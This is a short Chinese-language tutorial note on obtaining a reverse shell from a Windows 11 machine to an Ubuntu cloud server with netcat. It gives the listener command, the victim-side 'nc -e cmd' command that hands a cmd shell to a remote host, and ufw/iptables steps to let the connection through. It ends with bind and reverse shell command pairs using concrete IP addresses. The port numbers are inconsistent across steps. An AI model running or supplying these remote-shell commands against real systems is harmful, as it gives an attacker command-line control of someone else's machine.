使用云服务器(ubuntu)执行反弹shell的操作
云服务器初始配置默认端口开放情况为只开放22号端口和3389端口
nc命令:反弹shell 开放一个监听端口 7777号端口
nc -lvnp 7777
查看监听端口是否开放
netstat -tuln | grep 7897
此时端口开放会显示开放信息
被攻击机器(win11)执行nc命令将自己的cmd权限反弹到服务器上
nc -e cmd <服务器ip> 7788
此时发现win11执行命令无法将shell反弹到服务器上
排查过程
win11可以ping通服务器,nmap扫描监听端口发现监听端口开放,云服务器上允许入栈安全规则已经将监听端口开放。 此时查看文章发现可能是ubuntu的默认防火墙ufw和iptables规则表阻止了数据的入栈,修改默认防火墙规则和iptables表规则和可以接收到反弹的数据回传。
sudo ufw allow <监听端口>/tcp sudo iptables -A INPUT -p tcp --dport <监听端口> -j ACCEPT
反弹shell的正反连接的区别
正向连接: (被攻击方打开指定端口监听)
被 nc -e cmd -lvvp 7788
nc 192.168.2.127 7788
反向连接: (攻击方打开特定端口监听,被攻击方将权限给到攻击方)
被 nc -e cmd 192.168.2.1 7788
nc -lvvp 7788